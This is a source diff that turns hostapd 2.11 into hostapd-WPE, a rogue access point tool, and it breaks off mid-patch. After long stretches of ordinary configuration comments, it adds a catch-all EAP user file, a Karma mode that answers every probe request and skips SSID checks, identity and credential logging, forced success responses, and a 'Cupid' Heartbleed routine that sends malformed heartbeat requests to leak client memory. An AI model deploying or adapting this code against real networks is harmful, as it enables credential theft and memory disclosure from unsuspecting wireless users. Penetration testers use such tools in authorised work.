connection to a network based on ++# credentials. ++# format: ,[,][,][,...] ++# encoding: ++# 0 = Realm formatted in accordance with IETF RFC 4282 ++# 1 = UTF-8 formatted character string that is not formatted in ++# accordance with IETF RFC 4282 ++# NAI Realm(s): Semi-colon delimited NAI Realm(s) ++# EAP Method: [:<[AuthParam1:Val1]>][<[AuthParam2:Val2]>][...] ++# EAP Method types, see: ++# http://www.iana.org/assignments/eap-numbers/eap-numbers.xhtml#eap-numbers-4 ++# AuthParam (Table 8-188 in IEEE Std 802.11-2012): ++# ID 2 = Non-EAP Inner Authentication Type ++# 1 = PAP, 2 = CHAP, 3 = MSCHAP, 4 = MSCHAPV2 ++# ID 3 = Inner authentication EAP Method Type ++# ID 5 = Credential Type ++# 1 = SIM, 2 = USIM, 3 = NFC Secure Element, 4 = Hardware Token, ++# 5 = Softoken, 6 = Certificate, 7 = username/password, 9 = Anonymous, ++# 10 = Vendor Specific ++#nai_realm=0,example.com;example.net ++# EAP methods EAP-TLS with certificate and EAP-TTLS/MSCHAPv2 with ++# username/password ++#nai_realm=0,example.org,13[5:6],21[2:4][5:7] ++ ++# Arbitrary ANQP-element configuration ++# Additional ANQP-elements with arbitrary values can be defined by specifying ++# their contents in raw format as a hexdump of the payload. Note that these ++# values will override ANQP-element contents that may have been specified in the ++# more higher layer configuration parameters listed above. ++# format: anqp_elem=: ++# For example, AP Geospatial Location ANQP-element with unknown location: ++#anqp_elem=265:0000 ++# For example, AP Civic Location ANQP-element with unknown location: ++#anqp_elem=266:000000 ++ ++# GAS Address 3 behavior ++# 0 = P2P specification (Address3 = AP BSSID) workaround enabled by default ++# based on GAS request Address3 ++# 1 = IEEE 802.11 standard compliant regardless of GAS request Address3 ++# 2 = Force non-compliant behavior (Address3 = AP BSSID for all cases) ++#gas_address3=0 ++ ++# QoS Map Set configuration ++# ++# Comma delimited QoS Map Set in decimal values ++# (see IEEE Std 802.11-2012, 8.4.2.97) ++# ++# format: ++# [,],... ++# ++# There can be up to 21 optional DSCP Exceptions which are pairs of DSCP Value ++# (0..63 or 255) and User Priority (0..7). This is followed by eight DSCP Range ++# descriptions with DSCP Low Value and DSCP High Value pairs (0..63 or 255) for ++# each UP starting from 0. If both low and high value are set to 255, the ++# corresponding UP is not used. ++# ++# default: not set ++#qos_map_set=53,2,22,6,8,15,0,7,255,255,16,31,32,39,255,255,40,47,255,255 ++ ++##### Hotspot 2.0 ############################################################# ++ ++# Enable Hotspot 2.0 support ++#hs20=1 ++ ++# Disable Downstream Group-Addressed Forwarding (DGAF) ++# This can be used to configure a network where no group-addressed frames are ++# allowed. The AP will not forward any group-address frames to the stations and ++# random GTKs are issued for each station to prevent associated stations from ++# forging such frames to other stations in the BSS. ++#disable_dgaf=1 ++ ++# OSU Server-Only Authenticated L2 Encryption Network ++#osen=1 ++ ++# ANQP Domain ID (0..65535) ++# An identifier for a set of APs in an ESS that share the same common ANQP ++# information. 0 = Some of the ANQP information is unique to this AP (default). ++#anqp_domain_id=1234 ++ ++# Deauthentication request timeout ++# If the RADIUS server indicates that the station is not allowed to connect to ++# the BSS/ESS, the AP can allow the station some time to download a ++# notification page (URL included in the message). This parameter sets that ++# timeout in seconds. ++#hs20_deauth_req_timeout=60 ++ ++# Operator Friendly Name ++# This parameter can be used to configure one or more Operator Friendly Name ++# Duples. Each entry has a two or three character language code (ISO-639) ++# separated by colon from the operator friendly name string. ++#hs20_oper_friendly_name=eng:Example operator ++#hs20_oper_friendly_name=fin:Esimerkkioperaattori ++ ++# Connection Capability ++# This can be used to advertise what type of IP traffic can be sent through the ++# hotspot (e.g., due to firewall allowing/blocking protocols/ports). ++# format: :: ++# IP Protocol: 1 = ICMP, 6 = TCP, 17 = UDP ++# Port Number: 0..65535 ++# Status: 0 = Closed, 1 = Open, 2 = Unknown ++# Each hs20_conn_capab line is added to the list of advertised tuples. ++#hs20_conn_capab=1:0:2 ++#hs20_conn_capab=6:22:1 ++#hs20_conn_capab=17:5060:0 ++ ++# WAN Metrics ++# format: :
:
    :
    :
      : ++# WAN Info: B0-B1: Link Status, B2: Symmetric Link, B3: At Capabity ++# (encoded as two hex digits) ++# Link Status: 1 = Link up, 2 = Link down, 3 = Link in test state ++# Downlink Speed: Estimate of WAN backhaul link current downlink speed in kbps; ++# 1..4294967295; 0 = unknown ++# Uplink Speed: Estimate of WAN backhaul link current uplink speed in kbps ++# 1..4294967295; 0 = unknown ++# Downlink Load: Current load of downlink WAN connection (scaled to 255 = 100%) ++# Uplink Load: Current load of uplink WAN connection (scaled to 255 = 100%) ++# Load Measurement Duration: Duration for measuring downlink/uplink load in ++# tenths of a second (1..65535); 0 if load cannot be determined ++#hs20_wan_metrics=01:8000:1000:80:240:3000 ++ ++# Operating Class Indication ++# List of operating classes the BSSes in this ESS use. The Global operating ++# classes in Table E-4 of IEEE Std 802.11-2012 Annex E define the values that ++# can be used in this. ++# format: hexdump of operating class octets ++# for example, operating classes 81 (2.4 GHz channels 1-13) and 115 (5 GHz ++# channels 36-48): ++#hs20_operating_class=5173 ++ ++# OSU icons ++# ::::: ++#hs20_icon=32:32:eng:image/png:icon32:/tmp/icon32.png ++#hs20_icon=64:64:eng:image/png:icon64:/tmp/icon64.png ++ ++# OSU SSID (see ssid2 for format description) ++# This is the SSID used for all OSU connections to all the listed OSU Providers. ++#osu_ssid="example" ++ ++# OSU Providers ++# One or more sets of following parameter. Each OSU provider is started by the ++# mandatory osu_server_uri item. The other parameters add information for the ++# last added OSU provider. ++# ++#osu_server_uri=https://example.com/osu/ ++#osu_friendly_name=eng:Example operator ++#osu_friendly_name=fin:Esimerkkipalveluntarjoaja ++#osu_nai=anonymous@example.com ++#osu_method_list=1 0 ++#osu_icon=icon32 ++#osu_icon=icon64 ++#osu_service_desc=eng:Example services ++#osu_service_desc=fin:Esimerkkipalveluja ++# ++#osu_server_uri=... ++ ++##### Fast Session Transfer (FST) support ##################################### ++# ++# The options in this section are only available when the build configuration ++# option CONFIG_FST is set while compiling hostapd. They allow this interface ++# to be a part of FST setup. ++# ++# FST is the transfer of a session from a channel to another channel, in the ++# same or different frequency bands. ++# ++# For detals, see IEEE Std 802.11ad-2012. ++ ++# Identifier of an FST Group the interface belongs to. ++#fst_group_id=bond0 ++ ++# Interface priority within the FST Group. ++# Announcing a higher priority for an interface means declaring it more ++# preferable for FST switch. ++# fst_priority is in 1..255 range with 1 being the lowest priority. ++#fst_priority=100 ++ ++# Default LLT value for this interface in milliseconds. The value used in case ++# no value provided during session setup. Default is 50 ms. ++# fst_llt is in 1..4294967 range (due to spec limitation, see 10.32.2.2 ++# Transitioning between states). ++#fst_llt=100 ++ ++##### Radio measurements / location ########################################### ++ ++# The content of a LCI measurement subelement ++#lci= ++ ++# The content of a location civic measurement subelement ++#civic= ++ ++# Enable neighbor report via radio measurements ++#rrm_neighbor_report=1 ++ ++# Publish fine timing measurement (FTM) responder functionality ++# This parameter only controls publishing via Extended Capabilities element. ++# Actual functionality is managed outside hostapd. ++#ftm_responder=0 ++ ++# Publish fine timing measurement (FTM) initiator functionality ++# This parameter only controls publishing via Extended Capabilities element. ++# Actual functionality is managed outside hostapd. ++#ftm_initiator=0 ++ ++##### TESTING OPTIONS ######################################################### ++# ++# The options in this section are only available when the build configuration ++# option CONFIG_TESTING_OPTIONS is set while compiling hostapd. They allow ++# testing some scenarios that are otherwise difficult to reproduce. ++# ++# Ignore probe requests sent to hostapd with the given probability, must be a ++# floating point number in the range [0, 1). ++#ignore_probe_probability=0.0 ++# ++# Ignore authentication frames with the given probability ++#ignore_auth_probability=0.0 ++# ++# Ignore association requests with the given probability ++#ignore_assoc_probability=0.0 ++# ++# Ignore reassociation requests with the given probability ++#ignore_reassoc_probability=0.0 ++# ++# Corrupt Key MIC in GTK rekey EAPOL-Key frames with the given probability ++#corrupt_gtk_rekey_mic_probability=0.0 ++# ++# Include only ECSA IE without CSA IE where possible ++# (channel switch operating class is needed) ++#ecsa_ie_only=0 ++ ++##### Multiple BSSID support ################################################## ++# ++# Above configuration is using the default interface (wlan#, or multi-SSID VLAN ++# interfaces). Other BSSIDs can be added by using separator 'bss' with ++# default interface name to be allocated for the data packets of the new BSS. ++# ++# hostapd will generate BSSID mask based on the BSSIDs that are ++# configured. hostapd will verify that dev_addr & MASK == dev_addr. If this is ++# not the case, the MAC address of the radio must be changed before starting ++# hostapd (ifconfig wlan0 hw ether ). If a BSSID is configured for ++# every secondary BSS, this limitation is not applied at hostapd and other ++# masks may be used if the driver supports them (e.g., swap the locally ++# administered bit) ++# ++# BSSIDs are assigned in order to each BSS, unless an explicit BSSID is ++# specified using the 'bssid' parameter. ++# If an explicit BSSID is specified, it must be chosen such that it: ++# - results in a valid MASK that covers it and the dev_addr ++# - is not the same as the MAC address of the radio ++# - is not the same as any other explicitly specified BSSID ++# ++# Alternatively, the 'use_driver_iface_addr' parameter can be used to request ++# hostapd to use the driver auto-generated interface address (e.g., to use the ++# exact MAC addresses allocated to the device). ++# ++# Not all drivers support multiple BSSes. The exact mechanism for determining ++# the driver capabilities is driver specific. With the current (i.e., a recent ++# kernel) drivers using nl80211, this information can be checked with "iw list" ++# (search for "valid interface combinations"). ++# ++# Please note that hostapd uses some of the values configured for the first BSS ++# as the defaults for the following BSSes. However, it is recommended that all ++# BSSes include explicit configuration of all relevant configuration items. ++# ++#bss=wlan0_0 ++#ssid=test2 ++# most of the above items can be used here (apart from radio interface specific ++# items, like channel) ++ ++#bss=wlan0_1 ++#bssid=00:13:10:95:fe:0b ++# ... +diff '--color=auto' -rupN hostapd-2.11/hostapd/hostapd-wpe.eap_user hostapd-2.11-wpe/hostapd/hostapd-wpe.eap_user +--- hostapd-2.11/hostapd/hostapd-wpe.eap_user 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/hostapd-wpe.eap_user 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,107 @@ ++# hostapd user database for integrated EAP server ++ ++# Each line must contain an identity, EAP method(s), and an optional password ++# separated with whitespace (space or tab). The identity and password must be ++# double quoted ("user"). Password can alternatively be stored as ++# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password ++# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means ++# that the plaintext password does not need to be included in the user file. ++# Password hash is stored as hash:<16-octets of hex data> without quotation ++# marks. ++ ++# [2] flag in the end of the line can be used to mark users for tunneled phase ++# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous ++# identity can be used in the unencrypted phase 1 and the real user identity ++# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous ++# access is needed, two user entries is needed, one for phase 1 and another ++# with the same username for phase 2. ++# ++# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use ++# password option. ++# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a ++# password. ++# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration. ++# ++# * can be used as a wildcard to match any user identity. The main purposes for ++# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to ++# avoid having to configure every certificate for EAP-TLS authentication. The ++# first matching entry is selected, so * should be used as the last phase 1 ++# user entry. ++# ++# "prefix"* can be used to match the given prefix and anything after this. The ++# main purpose for this is to be able to avoid EAP method negotiation when the ++# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This ++# is only allowed for phase 1 identities. ++# ++# Multiple methods can be configured to make the authenticator try them one by ++# one until the peer accepts one. The method names are separated with a ++# comma (,). ++# ++# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP ++# version based on the Phase 1 identity. Without this flag, the EAP ++# authenticator advertises the highest supported version and select the version ++# based on the first PEAP packet from the supplicant. ++# ++# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel. ++# Tunneled EAP methods are configured with standard EAP method name and [2] ++# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP, ++# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a ++# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password ++# hash. ++# ++# Arbitrary RADIUS attributes can be added into Access-Accept packets similarly ++# to the way radius_auth_req_attr is used for Access-Request packet in ++# hostapd.conf. For EAP server, this is configured separately for each user ++# entry with radius_accept_attr= line(s) following the main user entry ++# line. ++ ++# Phase 1 users ++#"user" MD5 "password" ++#"test user" MD5 "secret" ++#"example user" TLS ++#"DOMAIN\user" MSCHAPV2 "password" ++#"gtc user" GTC "password" ++#"pax user" PAX "unknown" ++#"pax.user@example.com" PAX 0123456789abcdef0123456789abcdef ++#"psk user" PSK "unknown" ++#"psk.user@example.com" PSK 0123456789abcdef0123456789abcdef ++#"sake.user@example.com" SAKE 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef ++#"ttls" TTLS ++#"not anonymous" PEAP ++# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes ++#"0"* AKA,TTLS,TLS,PEAP,SIM ++#"1"* SIM,TTLS,TLS,PEAP,AKA ++#"2"* AKA,TTLS,TLS,PEAP,SIM ++#"3"* SIM,TTLS,TLS,PEAP,AKA ++#"4"* AKA,TTLS,TLS,PEAP,SIM ++#"5"* SIM,TTLS,TLS,PEAP,AKA ++#"6"* AKA' ++#"7"* AKA' ++#"8"* AKA' ++ ++# Wildcard for all other identities ++#* PEAP,TTLS,TLS,SIM,AKA ++ ++# Phase 2 (tunnelled within EAP-PEAP or EAP-TTLS) users ++#"t-md5" MD5 "password" [2] ++#"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2] ++#"t-gtc" GTC "password" [2] ++#"not anonymous" MSCHAPV2 "password" [2] ++#"user" MD5,GTC,MSCHAPV2 "password" [2] ++#"test user" MSCHAPV2 hash:000102030405060708090a0b0c0d0e0f [2] ++#"ttls-user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS-MSCHAPV2 "password" [2] ++ ++# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes in phase 2 ++#"0"* AKA [2] ++#"1"* SIM [2] ++#"2"* AKA [2] ++#"3"* SIM [2] ++#"4"* AKA [2] ++#"5"* SIM [2] ++#"6"* AKA' [2] ++#"7"* AKA' [2] ++#"8"* AKA' [2] ++ ++# WPE - DO NOT REMOVE - These entries are specifically in here ++* PEAP,TTLS,TLS,FAST ++"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "t" [2] +diff '--color=auto' -rupN hostapd-2.11/hostapd/main.c hostapd-2.11-wpe/hostapd/main.c +--- hostapd-2.11/hostapd/main.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/main.c 2024-07-26 12:24:18.700000000 +0000 +@@ -31,7 +31,7 @@ + #include "config_file.h" + #include "eap_register.h" + #include "ctrl_iface.h" +- ++#include "wpe/wpe.h" + + struct hapd_global { + void **drv_priv; +@@ -552,11 +552,17 @@ static int hostapd_global_run(struct hap + static void show_version(void) + { + fprintf(stderr, +- "hostapd v%s\n" ++ "hostapd-WPE v%s\n" + "User space daemon for IEEE 802.11 AP management,\n" + "IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n" + "Copyright (c) 2002-2024, Jouni Malinen " +- "and contributors\n", ++ "and contributors\n" ++ "-----------------------------------------------------\n" ++ "WPE (Wireless Pwnage Edition)\n" ++ "This version has been cleverly modified to target\n" ++ "wired and wireless users.\n" ++ "Twitter: @aircrackng\n" ++ "Website: https://aircrack-ng.org\n", + VERSION_STR); + } + +@@ -566,7 +572,7 @@ static void usage(void) + show_version(); + fprintf(stderr, + "\n" +- "usage: hostapd [-hdBKtvq] [-P ] [-e ] " ++ "usage: hostapd-wpe [-hdBKtvrkc] [-P ] [-e ] " + "\\\n" + " [-g ] [-G ]\\\n" + " [-i ]\\\n" +@@ -595,7 +601,16 @@ static void usage(void) + " -S start all the interfaces synchronously\n" + " -t include timestamps in some debug messages\n" + " -v show hostapd version\n" +- " -q show less debug messages (-qq for even less)\n"); ++ " -q show less debug messages (-qq for even less)\n" ++ "\n\n" ++ "WPE options:\n" ++ " -r Return Success where possible\n" ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ " -c Cupid Mode (Heartbleed clients)\n\n" ++#endif ++ " -k Karma Mode (Respond to all probes)\n" ++ "\n" ++ " Note: credentials logging is always enabled\n\n"); + + exit(1); + } +@@ -809,7 +824,7 @@ int main(int argc, char *argv[]) + #endif /* CONFIG_DPP */ + + for (;;) { +- c = getopt(argc, argv, "b:Bde:f:hi:KP:sSTtu:vg:G:q"); ++ c = getopt(argc, argv, "b:Bde:f:hi:KP:sSTtu:vg:G:qrkc"); + if (c < 0) + break; + switch (c) { +@@ -877,6 +892,15 @@ int main(int argc, char *argv[]) + case 'u': + return gen_uuid(optarg); + #endif /* CONFIG_WPS */ ++ case 'k': ++ wpe_conf.wpe_enable_karma++; ++ break; ++ case 'c': ++ wpe_conf.wpe_enable_cupid++; ++ break; ++ case 'r': ++ wpe_conf.wpe_enable_return_success++; ++ break; + case 'i': + if (hostapd_get_interface_names(&if_names, + &if_names_size, optarg)) +diff '--color=auto' -rupN hostapd-2.11/src/Makefile hostapd-2.11-wpe/src/Makefile +--- hostapd-2.11/src/Makefile 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/Makefile 2024-07-26 12:29:11.820000000 +0000 +@@ -1,5 +1,5 @@ + SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae pasn radius rsn_supp tls utils wps +-SUBDIRS += fst ++SUBDIRS += fst wpe + + all: + for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done +diff '--color=auto' -rupN hostapd-2.11/src/ap/beacon.c hostapd-2.11-wpe/src/ap/beacon.c +--- hostapd-2.11/src/ap/beacon.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/ap/beacon.c 2024-07-26 09:11:33.200000000 +0000 +@@ -33,7 +33,7 @@ + #include "dfs.h" + #include "taxonomy.h" + #include "ieee802_11_auth.h" +- ++#include "wpe/wpe.h" + + #ifdef NEED_AP_MLME + +@@ -1480,6 +1480,13 @@ void handle_probe_req(struct hostapd_dat + } + #endif /* CONFIG_TAXONOMY */ + ++ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) { ++ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len)); ++ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len); ++ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len); ++ hapd->conf->ssid.ssid_len = elems.ssid_len; ++ } ++ + res = ssid_match(hapd, elems.ssid, elems.ssid_len, + elems.ssid_list, elems.ssid_list_len, + elems.short_ssid_list, elems.short_ssid_list_len); +diff '--color=auto' -rupN hostapd-2.11/src/ap/ieee802_11.c hostapd-2.11-wpe/src/ap/ieee802_11.c +--- hostapd-2.11/src/ap/ieee802_11.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/ap/ieee802_11.c 2024-07-26 12:25:41.092000000 +0000 +@@ -58,7 +58,7 @@ + #include "comeback_token.h" + #include "nan_usd_ap.h" + #include "pasn/pasn_common.h" +- ++#include "wpe/wpe.h" + + #ifdef CONFIG_FILS + static struct wpabuf * +@@ -3438,8 +3438,8 @@ static u16 check_ssid(struct hostapd_dat + if (ssid_ie == NULL) + return WLAN_STATUS_UNSPECIFIED_FAILURE; + +- if (ssid_ie_len != hapd->conf->ssid.ssid_len || +- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) { ++ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len || ++ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) { + hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211, + HOSTAPD_LEVEL_INFO, + "Station tried to associate with unknown SSID " +diff '--color=auto' -rupN hostapd-2.11/src/ap/ieee802_1x.c hostapd-2.11-wpe/src/ap/ieee802_1x.c +--- hostapd-2.11/src/ap/ieee802_1x.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/ap/ieee802_1x.c 2024-07-26 09:11:33.204000000 +0000 +@@ -923,6 +923,8 @@ static void handle_eap_response(struct h + { + u8 type, *data; + struct eapol_state_machine *sm = sta->eapol_sm; ++ const u8 *identity; ++ size_t identity_len; + + if (!sm) + return; +@@ -942,6 +944,16 @@ static void handle_eap_response(struct h + eap->code, eap->identifier, be_to_host16(eap->length), + eap_server_get_name(0, type), type); + ++/* Print Response-Identity from STA*/ ++ identity = eap_get_identity(sm->eap, &identity_len); ++ os_free(sm->identity); ++ sm->identity = (u8 *) dup_binstr(identity, identity_len); ++ sm->identity_len = identity_len; ++ if (identity != NULL) { ++ hostapd_logger(hapd, sm->addr, HOSTAPD_MODULE_IEEE8021X, ++ HOSTAPD_LEVEL_INFO, "Identity received from STA: '%s'", sm->identity); ++ } ++ + sm->dot1xAuthEapolRespFramesRx++; + + wpabuf_free(sm->eap_if->eapRespData); +diff '--color=auto' -rupN hostapd-2.11/src/crypto/ms_funcs.h hostapd-2.11-wpe/src/crypto/ms_funcs.h +--- hostapd-2.11/src/crypto/ms_funcs.h 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/crypto/ms_funcs.h 2024-07-26 09:11:33.204000000 +0000 +@@ -9,6 +9,10 @@ + #ifndef MS_FUNCS_H + #define MS_FUNCS_H + ++int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge, ++ const u8 *username, size_t username_len, ++ u8 *challenge); ++ + int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge, + const u8 *username, size_t username_len, + const u8 *password, size_t password_len, +diff '--color=auto' -rupN hostapd-2.11/src/crypto/tls_openssl.c hostapd-2.11-wpe/src/crypto/tls_openssl.c +--- hostapd-2.11/src/crypto/tls_openssl.c 2024-07-26 12:31:12.300000000 +0000 ++++ hostapd-2.11-wpe/src/crypto/tls_openssl.c 2024-07-26 12:33:34.152000000 +0000 +@@ -29,7 +29,6 @@ + #include + #include + #include +-#include + #if OPENSSL_VERSION_NUMBER >= 0x30000000L + #include + #include +@@ -50,6 +49,7 @@ + #include "sha256.h" + #include "tls.h" + #include "tls_openssl.h" ++#include "wpe/wpe.h" + + #if !defined(CONFIG_FIPS) && \ + (defined(EAP_FAST) || defined(EAP_FAST_DYNAMIC) || \ +@@ -205,6 +205,10 @@ static int tls_add_ca_from_keystore_enco + + #endif /* ANDROID */ + ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++ + static int tls_openssl_ref_count = 0; + static int tls_ex_idx_session = -1; + +@@ -1724,7 +1728,12 @@ struct tls_connection * tls_connection_i + + conn->context = context; + SSL_set_app_data(conn->ssl, conn); +- SSL_set_msg_callback(conn->ssl, tls_msg_cb); ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ if (wpe_conf.wpe_enable_cupid) ++ SSL_set_msg_callback(conn->ssl, wpe_hb_cb); ++ else ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++ SSL_set_msg_callback(conn->ssl, tls_msg_cb); + SSL_set_msg_callback_arg(conn->ssl, conn); + options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 | + SSL_OP_SINGLE_DH_USE; +@@ -4501,6 +4510,10 @@ openssl_handshake(struct tls_connection + struct tls_context *context = conn->context; + int res; + struct wpabuf *out_data; ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ int i; ++ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2; ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ + + /* + * Give TLS handshake data from the server (if available) to OpenSSL +@@ -4619,6 +4632,30 @@ openssl_handshake(struct tls_connection + } + wpabuf_put(out_data, res); + ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) { ++ ++ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n"); ++ wpe_hb_ptr1 = NULL; ++ ++ for (i = 0; i < wpe_conf.wpe_hb_num_repeats; i++) { ++ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1); ++ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1); ++ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1); ++ ++ if (wpe_hb_ptr1) { ++ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2); ++ } else { ++ wpe_hb_ptr1 = wpe_hb_ptr2; ++ } ++ } ++ ++ conn->ssl->tlsext_hb_pending = 1; ++ wpe_conf.wpe_hb_num_tries--; ++ return wpe_hb_ptr1; ++ } ++#endif ++ + return out_data; + } + +@@ -4751,6 +4788,13 @@ struct wpabuf * tls_connection_encrypt(v + tls_show_errors(MSG_INFO, __func__, "BIO_reset failed"); + return NULL; + } ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata) { ++ wpe_hb_enc(conn); ++ } ++#endif ++ + res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data)); + if (res < 0) { + tls_show_errors(MSG_INFO, __func__, +@@ -4758,6 +4802,12 @@ struct wpabuf * tls_connection_encrypt(v + return NULL; + } + ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata) { ++ wpe_hb_enc(conn); ++ } ++#endif ++ + /* Read encrypted data to be sent to the server */ + buf = wpabuf_alloc(wpabuf_len(in_data) + 300); + if (buf == NULL) +@@ -6028,3 +6078,69 @@ bool tls_connection_get_own_cert_used(st + return SSL_get_certificate(conn->ssl) != NULL; + return false; + } ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++int wpe_hb_enc(struct tls_connection *conn) { ++ unsigned char *cbuf, *p; ++ ++ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */ ++ unsigned int padding = 16; //default: 16 /* Use minimum padding */ ++ ++ if (!SSL_is_init_finished(conn->ssl)) { ++ return -1; ++ } ++ ++ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || ++ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) { ++ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n"); ++ } else { ++ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n"); ++ } ++ ++ /* Check if padding is too long, payload and padding ++ * must not exceed 2^14 - 3 = 16381 bytes in total. ++ */ ++ OPENSSL_assert(real_payload + padding <= 16381); ++ ++ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding); ++ ++ if(cbuf==NULL) ++ return -1; ++ ++ p = cbuf; ++ ++ *p++ = TLS1_HB_REQUEST; ++ ++ ++ /* Payload length (18 bytes here) */ ++ //s2n(payload, p); /* standards compliant payload */ ++ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */ ++ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */ ++ ++ /* Sequence number */ ++ s2n(conn->ssl->tlsext_hb_seq, p); ++ /* 16 random bytes */ ++ RAND_pseudo_bytes(p, 16); ++ //RAND_bytes(p, 16); ++ p += 16; ++ /* Random padding */ ++ RAND_pseudo_bytes(p, padding); ++ //RAND_bytes(p, padding); ++ ++ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size); ++ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding); ++ ++ /* Send heartbeat request */ ++#ifdef TLS1_RT_HEARTBEAT ++ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT, ++#elif defined(DTLS1_RT_HEARTBEAT) ++ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, DTLS1_RT_HEARTBEAT, ++#endif ++ cbuf, 3 + real_payload + padding) >= 0) ++ conn->ssl->tlsext_hb_pending = 1; ++ OPENSSL_free(cbuf); ++ ++ return 0; ++} ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++ +diff '--color=auto' -rupN hostapd-2.11/src/eap_server/eap_server.c hostapd-2.11-wpe/src/eap_server/eap_server.c +--- hostapd-2.11/src/eap_server/eap_server.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/eap_server/eap_server.c 2024-07-26 09:11:33.204000000 +0000 +@@ -160,6 +160,8 @@ int eap_user_get(struct eap_sm *sm, cons + { + struct eap_user *user; + ++ char ident = 't'; ++ + if (sm == NULL || sm->eapol_cb == NULL || + sm->eapol_cb->get_eap_user == NULL) + return -1; +@@ -171,6 +173,11 @@ int eap_user_get(struct eap_sm *sm, cons + if (user == NULL) + return -1; + ++ if (phase2) { ++ identity = (const u8 *)&ident; ++ identity_len = 1; ++ } ++ + if 